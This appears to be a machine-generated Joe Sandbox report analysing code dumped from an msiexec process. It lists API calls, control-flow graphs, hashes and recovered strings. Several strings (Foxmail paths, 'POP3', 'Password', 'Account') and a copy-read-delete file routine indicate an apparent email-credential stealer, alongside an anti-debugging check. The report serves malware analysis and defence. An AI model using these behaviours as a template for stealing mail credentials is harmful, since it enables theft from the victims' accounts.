                                                                                                          • lstrlenW.KERNEL32(?), ref: 1FC714C5
                                                                                                          • lstrlenW.KERNEL32(?), ref: 1FC714E0
                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1FC7150F
                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 1FC71521
                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1FC71547
                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 1FC71553
                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1FC71579
                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 1FC71585
                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1FC715AB
                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 1FC715B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                          • API String ID: 672098462-2938083778
                                                                                                          • Opcode ID: 36f863f40dd18563bbd7ea8c925df9a25fae8922c75a67cd77fd90c0c28f3575
                                                                                                          • Instruction ID: cdb14321525c63212b4070d62e859f039155d5c89c589b29431799ee4a3d3667
                                                                                                          • Opcode Fuzzy Hash: 36f863f40dd18563bbd7ea8c925df9a25fae8922c75a67cd77fd90c0c28f3575
                                                                                                          • Instruction Fuzzy Hash: 1381D575A10358A9EB20D7A0DC85FEF737DEF84710F001696F908E7190EE756A88CB95
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1FC761DA
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 1FC761E4
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1FC761F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                          • String ID:
                                                                                                          • API String ID: 3906539128-0
                                                                                                          • Opcode ID: 085af5eff730fdd0baefbb77ce2ed57b7d0abd4f9462a0c1cba2a8fa6920e144
                                                                                                          • Instruction ID: ebf3fb2bde7eb717e642f276230a09b7fcd2b3a49ec8de85a3600a9064f46b4c
                                                                                                          • Opcode Fuzzy Hash: 085af5eff730fdd0baefbb77ce2ed57b7d0abd4f9462a0c1cba2a8fa6920e144
                                                                                                          • Instruction Fuzzy Hash: 0B31D67590122DABCB21DF24D988BCDBBB4FF08710F5042DAE81CA7250EB30AB959F45
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(?,?,1FC74A8A,?,1FC82238,0000000C,1FC74BBD,00000000,00000000,00000001,1FC72082,1FC82108,0000000C,1FC71F3A,?), ref: 1FC74AD5
                                                                                                          • TerminateProcess.KERNEL32(00000000,?,1FC74A8A,?,1FC82238,0000000C,1FC74BBD,00000000,00000000,00000001,1FC72082,1FC82108,0000000C,1FC71F3A,?), ref: 1FC74ADC
                                                                                                          • ExitProcess.KERNEL32 ref: 1FC74AEE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: dfa24d9ae1c18c845cbdb4449627ec8dcf1d18752c569c1f39a12499afc90139
                                                                                                          • Instruction ID: 44d967efadda84a51f27262d1affa6c44dc76f258e57e92f53b885d387a9fc7e
                                                                                                          • Opcode Fuzzy Hash: dfa24d9ae1c18c845cbdb4449627ec8dcf1d18752c569c1f39a12499afc90139
                                                                                                          • Instruction Fuzzy Hash: CAE01236000229EFCB016F24C958A897BAAEB40761F108254FA048A120DF36F852EA44
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 54951025-0
                                                                                                          • Opcode ID: 2eb030d38037fce93106c3474eb38ba03b5546fad358a63b955622a654c9c11a
                                                                                                          • Instruction ID: 50c16c40d2f1f6b002edc6d63f481bf7a43c05eab4d3c318a614327ff084f25e
                                                                                                          • Opcode Fuzzy Hash: 2eb030d38037fce93106c3474eb38ba03b5546fad358a63b955622a654c9c11a
                                                                                                          • Instruction Fuzzy Hash: 5FA011302002238FC3008E30838A20C3AECAA00AA0B0022E8EA08C0220EB22A020AA02

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 1FC71CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D1B
                                                                                                            • Part of subcall function 1FC71CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1FC71D37
                                                                                                            • Part of subcall function 1FC71CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D4B
                                                                                                          • _strlen.LIBCMT ref: 1FC71855
                                                                                                          • _strlen.LIBCMT ref: 1FC71869
                                                                                                          • _strlen.LIBCMT ref: 1FC7188B
                                                                                                          • _strlen.LIBCMT ref: 1FC718AE
                                                                                                          • _strlen.LIBCMT ref: 1FC718C8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                          • API String ID: 3296212668-3023110444
                                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                          • Instruction ID: cc7e17aa6d2fb2e00084469259489b6ad9739e077329005b72ed0dcfb7e0df2b
                                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                          • Instruction Fuzzy Hash: 3861F576D04319ABEF15CBA4D840BDEBBBBAF85204F004256D104B7294EF747A4AEF52

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen
                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                          • API String ID: 4218353326-230879103
                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                          • Instruction ID: 60174c023468e54e7ba34cbf113852a5ca25bfd2ee0e403ceb4e9818b67aa73d
                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                          • Instruction Fuzzy Hash: A87129B6D003689BDF119BB58884ADFBBFDAF49200F104196E544D7241EE74E789EBA0

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 203 1fc77cc2-1fc77cd6 204 1fc77d44-1fc77d4c 203->204 205 1fc77cd8-1fc77cdd 203->205 207 1fc77d93-1fc77dab call 1fc77e35 204->207 208 1fc77d4e-1fc77d51 204->208 205->204 206 1fc77cdf-1fc77ce4 205->206 206->204 209 1fc77ce6-1fc77ce9 206->209 217 1fc77dae-1fc77db5 207->217 208->207 211 1fc77d53-1fc77d90 call 1fc7571e * 4 208->211 209->204 212 1fc77ceb-1fc77cf3 209->212 211->207 215 1fc77cf5-1fc77cf8 212->215 216 1fc77d0d-1fc77d15 212->216 215->216 219 1fc77cfa-1fc77d0c call 1fc7571e call 1fc790ba 215->219 222 1fc77d17-1fc77d1a 216->222 223 1fc77d2f-1fc77d43 call 1fc7571e * 2 216->223 220 1fc77db7-1fc77dbb 217->220 221 1fc77dd4-1fc77dd8 217->221 219->216 229 1fc77dd1 220->229 230 1fc77dbd-1fc77dc0 220->230 225 1fc77df0-1fc77dfc 221->225 226 1fc77dda-1fc77ddf 221->226 222->223 231 1fc77d1c-1fc77d2e call 1fc7571e call 1fc791b8 222->231 223->204 225->217 236 1fc77dfe-1fc77e0b call 1fc7571e 225->236 233 1fc77de1-1fc77de4 226->233 234 1fc77ded 226->234 229->221 230->229 238 1fc77dc2-1fc77dd0 call 1fc7571e * 2 230->238 231->223 233->234 243 1fc77de6-1fc77dec call 1fc7571e 233->243 234->225 238->229 243->234
                                                                                                          APIs
                                                                                                          • ___free_lconv_mon.LIBCMT ref: 1FC77D06
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC790D7
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC790E9
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC790FB
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC7910D
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC7911F
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC79131
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC79143
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC79155
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC79167
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC79179
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC7918B
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC7919D
                                                                                                            • Part of subcall function 1FC790BA: _free.LIBCMT ref: 1FC791AF
                                                                                                          • _free.LIBCMT ref: 1FC77CFB
                                                                                                            • Part of subcall function 1FC7571E: HeapFree.KERNEL32(00000000,00000000,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?), ref: 1FC75734
                                                                                                            • Part of subcall function 1FC7571E: GetLastError.KERNEL32(?,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?,?), ref: 1FC75746
                                                                                                          • _free.LIBCMT ref: 1FC77D1D
                                                                                                          • _free.LIBCMT ref: 1FC77D32
                                                                                                          • _free.LIBCMT ref: 1FC77D3D
                                                                                                          • _free.LIBCMT ref: 1FC77D5F
                                                                                                          • _free.LIBCMT ref: 1FC77D72
                                                                                                          • _free.LIBCMT ref: 1FC77D80
                                                                                                          • _free.LIBCMT ref: 1FC77D8B
                                                                                                          • _free.LIBCMT ref: 1FC77DC3
                                                                                                          • _free.LIBCMT ref: 1FC77DCA
                                                                                                          • _free.LIBCMT ref: 1FC77DE7
                                                                                                          • _free.LIBCMT ref: 1FC77DFF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                          • String ID:
                                                                                                          • API String ID: 161543041-0
                                                                                                          • Opcode ID: fdc8ce50b9cb700aa0d4f89f7a0b0593431e5318cdefcc59c845090a75bfce25
                                                                                                          • Instruction ID: e7c2992faf38e71dca83c33dd3727787c74f4e3f83e9b147171cdfe2749d25ab
                                                                                                          • Opcode Fuzzy Hash: fdc8ce50b9cb700aa0d4f89f7a0b0593431e5318cdefcc59c845090a75bfce25
                                                                                                          • Instruction Fuzzy Hash: F731A032618389DFEB258A38D944BA677E9EF90350F104B1EE859CB150DF31F894EB10

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 1FC759EA
                                                                                                            • Part of subcall function 1FC7571E: HeapFree.KERNEL32(00000000,00000000,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?), ref: 1FC75734
                                                                                                            • Part of subcall function 1FC7571E: GetLastError.KERNEL32(?,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?,?), ref: 1FC75746
                                                                                                          • _free.LIBCMT ref: 1FC759F6
                                                                                                          • _free.LIBCMT ref: 1FC75A01
                                                                                                          • _free.LIBCMT ref: 1FC75A0C
                                                                                                          • _free.LIBCMT ref: 1FC75A17
                                                                                                          • _free.LIBCMT ref: 1FC75A22
                                                                                                          • _free.LIBCMT ref: 1FC75A2D
                                                                                                          • _free.LIBCMT ref: 1FC75A38
                                                                                                          • _free.LIBCMT ref: 1FC75A43
                                                                                                          • _free.LIBCMT ref: 1FC75A51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 6b7e090b2153e2fee758accd597969795186a8d2c64c19b090325ab4ab9dfbc9
                                                                                                          • Instruction ID: 985717d6bad740a517a7544d5a154bdccb7de0f57988fd2a3ec66ef549c29dd9
                                                                                                          • Opcode Fuzzy Hash: 6b7e090b2153e2fee758accd597969795186a8d2c64c19b090325ab4ab9dfbc9
                                                                                                          • Instruction Fuzzy Hash: EB11897E520288FFCB11DF54C841CDD7F65EF94290B5546A5B9084F125DE31EA58AB80

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D1B
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1FC71D37
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D4B
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D58
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D72
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D7D
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC71D8A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                          • String ID:
                                                                                                          • API String ID: 1454806937-0
                                                                                                          • Opcode ID: 0510fdc0ec33404cc5b5be94d432238482fc236e8bc0aa8d8677f7658835a1e3
                                                                                                          • Instruction ID: 4a821c76aed8c580e3553fef3796dd7253e5cf105235dfecd6f6ebeea2d5f5f4
                                                                                                          • Opcode Fuzzy Hash: 0510fdc0ec33404cc5b5be94d432238482fc236e8bc0aa8d8677f7658835a1e3
                                                                                                          • Instruction Fuzzy Hash: EA21317294122DBFD7119BA08CCCEEB76ECEB58754F0007A5F612D2140DA71AE45AB70

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 304 1fc79492-1fc794ef GetConsoleCP 305 1fc794f5-1fc79511 304->305 306 1fc79632-1fc79644 call 1fc72ada 304->306 308 1fc79513-1fc7952a 305->308 309 1fc7952c-1fc7953d call 1fc77c19 305->309 312 1fc79566-1fc79575 call 1fc779e6 308->312 315 1fc79563-1fc79565 309->315 316 1fc7953f-1fc79542 309->316 312->306 320 1fc7957b-1fc7959b WideCharToMultiByte 312->320 315->312 318 1fc79609-1fc79628 316->318 319 1fc79548-1fc7955a call 1fc779e6 316->319 318->306 319->306 326 1fc79560-1fc79561 319->326 320->306 322 1fc795a1-1fc795b7 WriteFile 320->322 324 1fc7962a-1fc79630 GetLastError 322->324 325 1fc795b9-1fc795ca 322->325 324->306 325->306 327 1fc795cc-1fc795d0 325->327 326->320 328 1fc795d2-1fc795f0 WriteFile 327->328 329 1fc795fe-1fc79601 327->329 328->324 330 1fc795f2-1fc795f6 328->330 329->305 331 1fc79607 329->331 330->306 332 1fc795f8-1fc795fb 330->332 331->306 332->329
                                                                                                          APIs
                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1FC79C07,?,00000000,?,00000000,00000000), ref: 1FC794D4
                                                                                                          • __fassign.LIBCMT ref: 1FC7954F
                                                                                                          • __fassign.LIBCMT ref: 1FC7956A
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1FC79590
                                                                                                          • WriteFile.KERNEL32(?,?,00000000,1FC79C07,00000000,?,?,?,?,?,?,?,?,?,1FC79C07,?), ref: 1FC795AF
                                                                                                          • WriteFile.KERNEL32(?,?,00000001,1FC79C07,00000000,?,?,?,?,?,?,?,?,?,1FC79C07,?), ref: 1FC795E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 1324828854-0
                                                                                                          • Opcode ID: fd0695c564fd5d9b83613412c843c1313307fa10a5ae7b2379ed4c2da0d13e32
                                                                                                          • Instruction ID: 7de5a7f2bde58fcff21e2109d52255d8453750448c27f3e2326c53bb0768fad2
                                                                                                          • Opcode Fuzzy Hash: fd0695c564fd5d9b83613412c843c1313307fa10a5ae7b2379ed4c2da0d13e32
                                                                                                          • Instruction Fuzzy Hash: 4851E871D0024A9FCB00CFA4C891ADEBBF9FF08310F14435AE952E7291EB31A951DB61

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 333 1fc73370-1fc733b5 call 1fc73330 call 1fc737a7 338 1fc733b7-1fc733c9 333->338 339 1fc73416-1fc73419 333->339 341 1fc73439-1fc73442 338->341 342 1fc733cb 338->342 340 1fc7341b-1fc73428 call 1fc73790 339->340 339->341 345 1fc7342d-1fc73436 call 1fc73330 340->345 344 1fc733d0-1fc733e7 342->344 346 1fc733fd 344->346 347 1fc733e9-1fc733f7 call 1fc73740 344->347 345->341 348 1fc73400-1fc73405 346->348 355 1fc7340d-1fc73414 347->355 356 1fc733f9 347->356 348->344 351 1fc73407-1fc73409 348->351 351->341 354 1fc7340b 351->354 354->345 355->345 357 1fc73443-1fc7344c 356->357 358 1fc733fb 356->358 359 1fc73486-1fc73496 call 1fc73774 357->359 360 1fc7344e-1fc73455 357->360 358->348 366 1fc734aa-1fc734c6 call 1fc73330 call 1fc73758 359->366 367 1fc73498-1fc734a7 call 1fc73790 359->367 360->359 362 1fc73457-1fc73466 call 1fc7bbe0 360->362 368 1fc73483 362->368 369 1fc73468-1fc73480 362->369 367->366 368->359 369->368
                                                                                                          APIs
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1FC7339B
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 1FC733A3
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1FC73431
                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1FC7345C
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 1FC734B1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                          • Opcode ID: 0d6d82f7a957321e54ce0127134693e2ec905870d54160f5863d6511cf3e4c40
                                                                                                          • Instruction ID: c1fb6988b347f189ac5d71e927e96b2b210fc16f338f84fcf5bf0dddde437901
                                                                                                          • Opcode Fuzzy Hash: 0d6d82f7a957321e54ce0127134693e2ec905870d54160f5863d6511cf3e4c40
                                                                                                          • Instruction Fuzzy Hash: C141E539E00209ABCB01CF69C881ACEBFB5BF45324F008355D919AF251DF35EA15EB91

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 1FC79221: _free.LIBCMT ref: 1FC7924A
                                                                                                          • _free.LIBCMT ref: 1FC792AB
                                                                                                            • Part of subcall function 1FC7571E: HeapFree.KERNEL32(00000000,00000000,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?), ref: 1FC75734
                                                                                                            • Part of subcall function 1FC7571E: GetLastError.KERNEL32(?,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?,?), ref: 1FC75746
                                                                                                          • _free.LIBCMT ref: 1FC792B6
                                                                                                          • _free.LIBCMT ref: 1FC792C1
                                                                                                          • _free.LIBCMT ref: 1FC79315
                                                                                                          • _free.LIBCMT ref: 1FC79320
                                                                                                          • _free.LIBCMT ref: 1FC7932B
                                                                                                          • _free.LIBCMT ref: 1FC79336
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                          • Instruction ID: ba4678f446abf3e9640d587d38f9756423ab0843b38e6071d5c4cbc8d07ea01a
                                                                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                          • Instruction Fuzzy Hash: F5119335650B08FBE620FBF0DC45FCB7B9D9F84700F408E28A69A76452DE34B5086752

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 415 1fc78821-1fc7883a 416 1fc78850-1fc78855 415->416 417 1fc7883c-1fc7884c call 1fc79341 415->417 419 1fc78857-1fc7885f 416->419 420 1fc78862-1fc78886 MultiByteToWideChar 416->420 417->416 427 1fc7884e 417->427 419->420 421 1fc7888c-1fc78898 420->421 422 1fc78a19-1fc78a2c call 1fc72ada 420->422 424 1fc788ec 421->424 425 1fc7889a-1fc788ab 421->425 431 1fc788ee-1fc788f0 424->431 428 1fc788ad-1fc788bc call 1fc7bf20 425->428 429 1fc788ca-1fc788db call 1fc756d0 425->429 427->416 435 1fc78a0e 428->435 441 1fc788c2-1fc788c8 428->441 429->435 442 1fc788e1 429->442 434 1fc788f6-1fc78909 MultiByteToWideChar 431->434 431->435 434->435 438 1fc7890f-1fc7892a call 1fc75f19 434->438 439 1fc78a10-1fc78a17 call 1fc78801 435->439 438->435 447 1fc78930-1fc78937 438->447 439->422 446 1fc788e7-1fc788ea 441->446 442->446 446->431 448 1fc78971-1fc7897d 447->448 449 1fc78939-1fc7893e 447->449 451 1fc7897f-1fc78990 448->451 452 1fc789c9 448->452 449->439 450 1fc78944-1fc78946 449->450 450->435 453 1fc7894c-1fc78966 call 1fc75f19 450->453 455 1fc78992-1fc789a1 call 1fc7bf20 451->455 456 1fc789ab-1fc789bc call 1fc756d0 451->456 454 1fc789cb-1fc789cd 452->454 453->439 468 1fc7896c 453->468 458 1fc78a07-1fc78a0d call 1fc78801 454->458 459 1fc789cf-1fc789e8 call 1fc75f19 454->459 455->458 471 1fc789a3-1fc789a9 455->471 456->458 467 1fc789be 456->467 458->435 459->458 473 1fc789ea-1fc789f1 459->473 472 1fc789c4-1fc789c7 467->472 468->435 471->472 472->454 474 1fc789f3-1fc789f4 473->474 475 1fc78a2d-1fc78a33 473->475 476 1fc789f5-1fc78a05 WideCharToMultiByte 474->476 475->476 476->458 477 1fc78a35-1fc78a3c call 1fc78801 476->477 477->439
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,1FC76FFD,00000000,?,?,?,1FC78A72,?,?,00000100), ref: 1FC7887B
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,1FC78A72,?,?,00000100,5EFC4D8B,?,?), ref: 1FC78901
